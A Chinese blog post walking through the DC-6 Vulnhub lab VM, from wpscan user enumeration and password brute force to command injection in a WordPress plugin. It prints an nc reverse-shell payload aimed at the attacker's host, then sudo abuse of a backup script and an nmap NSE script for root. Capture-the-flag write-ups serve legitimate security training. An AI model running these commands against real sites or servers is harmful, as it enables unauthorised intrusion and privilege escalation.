DC-6靶机

原创 已于 2024-08-11 17:13:44 修改 · 370 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记

于 2024-08-11 17:10:50 首次发布

信息收集

靶机扫描

nmap 192.168.93.0/24

端口扫描,根据80端口的信息,发现我们并不能直接访问靶机的web页面,和/wordy相关

nmap -A 192.168.93.163 -p-

工具信息应该是要加入到hosts文件里,进行加入

进行页面访问

进行目录扫描

进行拼接访问目录/wp-admin

WPScan是一款强大的WordPress安全扫描工具

使用WPscan扫描网站包含的用户名

wpscan --url http://wordy -e u

得到admin,mark,graham,sarah,jens几个用户名

根据靶机线索给予的代码,可以得到一个密码字典,这个字典在kali里面是有的,将文件输出到当前目录的passwords.txt

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

使用WPscan工具利用密码字典pssswords.txt去扫描网站

wpscan --url http://wordy --passwords passwords.txt

得到用户名mark和密码helpdesk01

进行登录,登陆成功

有个Activity monitor插件,在插件的tools选项中

在ID or integer的输入框中输入东西,然后点击Lookup,发现有回显

获取shell

尝试一下命令执行

baidu.com | ls

用bp抓包一下,在bp中输入baidu.com | nc -e /bin/sh 192.168.93.130 7878进行反弹shell,同时在kali中监听7878端口

发现成功获取shell,用python开启一个交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

进入/home目录,分别进入各个用户目录下查看存在什么可利用的文件

发现目录下面是几个用户文件,进去查看,在mark用户中,发现独有的stuff文件,查看文件内容

从thing-to-do.txt文件中我们得到graham用户的密码GSo7isUM1D4

利用用户graham和密码GSo7isUM1D4连接靶机的ssh服务

ssh graham@192.168.93.163

提权

进行sudo -l

发现可操作/home/jens/backups.sh,且执行时以jens用户身份执行

向脚本中写入/bin/bash命令,然后让jens用户来执行

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

成功切换为jens用户

再次进行sudo -l

发现nmap命令执行时以root身份执行,需要nmap打开一个shell即可获得root权限,尝试编写提权脚本

先进入jens用户目录,编写并执行脚本

cd /home/jens

echo "os.execute('/bin/bash')">demon.nse
//nse为nmap可执行文件后缀,此命令为开启一个终端(以当前身份)
sudo nmap --script=demon.nse
//执行此脚本

成功获取root权限(这个shell不会显示打的命令,但是不影响输入)

查看/root目录,找到theflag.txt,

陽陽yy
关注
DC-6靶机渗透测试
m0_66225311的博客
08-05 703
又是一个远古靶机,最近又做了一做,发现可以直接用50110.py文件一把梭获取权限,不需要之前那么繁琐的用html文件来反弹shell了。第一次没能进行尝试,要不然就能搞点不一样的了
DC-6靶机进行渗透测试
zll___的博客
03-20 1106
DC-6靶机进行渗透测试
【vulnhub】DC-6靶机
wbplife的博客
08-08 533
用bp抓包一下,在bp中输入baidu.com | nc -e /bin/sh 192.168.93.130 7878进行反弹shell,同时在kali中监听7878端口。根据靶机线索给予的代码,可以得到一个密码字典,这个字典在kali里面是有的,将文件输出到当前目录的passwords.txt。发现目录下面是几个用户文件,进去查看,在mark用户中,发现独有的stuff文件,查看文件内容。得到admin,mark,graham,sarah,jens几个用户名。
渗透测试靶机vulnhub——DC6实战笔记
qq_56426046的博客
04-05 814
wpscan爆破用户密码****插件远程命令执行的漏洞nmap脚本执行提权若是你所期望的,那定会得到强烈的回应。
渗透DC-6靶机
C-HOWE的博客
12-19 990
本篇文章旨在为网络安全渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透DC-6靶机有一个初步的了解。
DC-6靶机通关
qq_63831588的博客
07-29 2852
做完感觉这个靶机还是很有意思的,并且它其实不难,但是这个思路真的很有意思。首先他的关键点在于让我们通过wp插件的漏洞去拿到webshell其次就是普通用户间的博弈,以往我们都是通过账号密码看来进行切换,而这次是通过sudo普通用户来切换然后最后的提权还是用的sudo,确实也听巧妙的,这次我愿称之为将 sudo 进行到底!!!~~~~~持续更新中。
DC-6靶机渗透学习记录
tyut_dummy的博客
07-16 1772
7.用bp抓包一下,在bp中输入baidu.com | nc -e /bin/sh 192.168.6.137 7878进行反弹shell,同时在kali中监听7878端口。6.在ID or integer的输入框中输入一个网站地址,如:baidu.com,然后点击Lookup,发现有回显。`--detection-mode`:设置扫描的侦测模式,如快速、默认或深度。例如:nmap,WPscan,burpsuite,dirb等等。得到admin,mark,graham,sarah,jens几个用户名。
DC-6靶机做题记录
Fab1an的博客
01-21 1602
hosts文件域名解析对WordPress的了解程度,比如后台是wp-admin,还有一个readme.htmlWordPress的扫描器叫wpscan,以及wpscan的用法,可以百度要会爆破它的用户名和密码,可以用BurpSuite或者wpscan去爆破,也可以用hydra或者其他的一些方式进入后台找寻一个能写php代码的地方,把shell弹回来找到一个插件的漏洞,然后用它来反弹shellnamp提权,用nse脚本提权。
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 2292
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与提权1.得到SSH账号2.登陆对方SSH3,切换用户并提权 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
DC-6靶机渗透
m0_62008601的博客
05-31 706
攻击机kali:192.168.56.102 靶机dc-6:192.168.56.107 为确保两台服务器在同一网段下,我这里dc-6的网络设置为仅主机网络,kali的设置为桥接模式,这样才能通过kali扫描出dc-6靶机的ip。 配置好环境之后就可以开始操作了 扫描存活的主机 扫描靶机开放的端口 看到开放了80端口和22端口,浏览器进行访问 无法访问,这个问题和前面的一个靶机类似,存在域名解析错误,知道了域名为wordy,就可以去hosts文件(在/etc/hosts).
DC-6靶机渗透详细流程
braty_的博客
01-28 687
wpscan --url http://wordy -U users.list -P /usr/share/wordlists/rockyou.txt //kali自带的字典。接着我们向里面追加写入一个shell的命令,发现现在的用户权限不够,待会再说。提权后是盲敲,光标没变化,,算了,编辑好在粘贴去找flag。发现访问不了,,记起来有重定向,要添加 hosts。哦吼,意外之喜,,发现了5个用户名。先看看 SUID:没啥有用的信息。文件,那我们直接先 su 过去。看回显,,果然存在。
【vulnhub】---DC-6靶机
qq_43168364的博客
08-21 826
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
pcie笔记
bortonyu的博客
12-11 742
模式全称描述共用参考时钟Root Complex(RC)和 Endpoint(EP)使用同一颗外部 RefclkSRNSRC 和 EP 使用独立时钟源,但 不允许展频(SSC)SRISRC 和 EP 使用独立时钟源,允许各自带有 SSC 抖动txt复制编辑FS 表示信号的总摆幅,用于判断是否满足发送器输出的最大电压范围(如 800mV full swing)。Full Swing 模式下:FS ∈ [24, 63]Reduced Swing 模式下:FS ∈ [12, 63]
运放学习笔记
Z97371539的博客
12-13 445
单电源运放是指仅使用单一电源电压(例如,+5V)和地(0V)作为电源供给的运放。也就是说,它只需要一个正电压和地作为参考电压,而不需要负电压。
先立后破:Linux 下“新建管理员 → 验证 → 禁用 root 远程 SSH”的零翻车笔记
weixin_45626288的博客
12-12 455
本文提供了一套零风险的Linux服务器安全加固流程,重点解决等保2.0要求的"禁用root远程SSH"需求。通过"先立后破"原则,先创建并验证新管理员账号的sudo权限,再禁用root远程登录,全程保持root会话不断开作为应急通道。关键步骤包括:创建新管理员账号、配置sudo权限、严格测试新账号功能、安全修改sshd配置、保留本地root登录权限等。文章特别强调验证环节的重要性,并提供了快速回滚方案,确保运维人员不会因配置失误导致服务器失联。这套方法适用于Kylin
Java Stream 数据处理笔记:从嵌套集合中过滤特定类别的Map
DolphinHome的博客
12-09 492
扁平化嵌套结构:使用flatMap将转换为Stream<T>过滤条件放置:在收集前进行过滤,避免处理不必要的数据空值安全:多层空值检查防止NPE性能优化先过滤后映射大数据量使用并行流使用合适的Map实现(如用于并行流)冲突处理:指定合并函数处理键冲突通过以上方法,您可以高效地从复杂嵌套结构中提取并过滤特定类别的数据,构建所需的Map结构。这种模式在实际项目中非常常见,掌握这些技巧能显著提升代码质量和开发效率。
学习笔记095——Ubuntu 安装 lrzsz 服务?
code__bee的博客
12-10 388
lrzsz是一款基于协议的文件传输工具集,专门用于在终端环境下实现本地与远程服务器之间的文件上传和下载,是 Linux/Unix 运维和开发场景中常用的轻量级工具。
AD学习笔记-36 gerber文件输出
最新发布
2401_83451707的博客
12-14 184
今天,我们学习如何导出gerber文件,这是我们给板厂的最终文件。
DC-6靶机端口80访问成功wapplyzer在哪找
06-10
### Wapplyzer 工具的使用与下载 Wapplyzer 是一个用于识别 Web 应用程序技术栈的工具,可以快速检测出目标站点使用的 CMS、编程语言、框架以及其他相关信息。以下是关于 Wapplyzer 的下载和使用方法: #### 下载方式 Wapplyzer 工具通常作为浏览器插件提供,用户可以直接从浏览器的扩展商店下载并安装。以下是具体步骤: - 对于 **Chrome** 浏览器,访问 [Chrome Web Store](https://chrome.google.com/webstore/) 并搜索 Wappalyzer[^1]。 - 对于 **Firefox** 浏览器,访问 [Mozilla Add-ons](https://addons.mozilla.org/) 并搜索 Wappalyzer[^2]。 此外,Wapplyzer 还提供命令行版本(CLI),可以通过以下命令安装: ```bash npm install -g wappalyzer ``` 确保系统中已安装 Node.js 和 npm,否则需要先进行安装。 #### 在 DC-6 靶机端口 80 上的测试 在 DC-6 靶机中,端口 80 提供了一个基于 WordPress 的网站服务。使用 Wapplyzer 可以帮助识别该网站的技术栈,包括 CMS 版本、编程语言、Web 服务器类型等。以下是操作步骤: 1. **启动靶机并扫描 IP 地址** 使用 `nmap` 扫描靶机的开放端口,确认端口 80 是否开放: ```bash nmap -sS <靶机IP> ``` 确保端口 80 正常运行并提供 Web 服务[^3]。 2. **使用 Wapplyzer 分析网站** 如果使用浏览器插件版 Wapplyzer,直接访问靶机的 Web 服务地址(例如 `http://<靶机IP>`),插件会自动分析并显示结果。 如果使用 CLI 版本,执行以下命令: ```bash wappalyzer http://<靶机IP> ``` 输出将包含目标站点的技术信息,例如: ``` WordPress: 5.1.1 PHP: 7.2 Apache: 2.4 MySQL: 5.7 ``` 通过上述步骤,可以快速获取 DC-6 靶机端口 80 的技术细节,为后续渗透测试提供基础信息。 --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值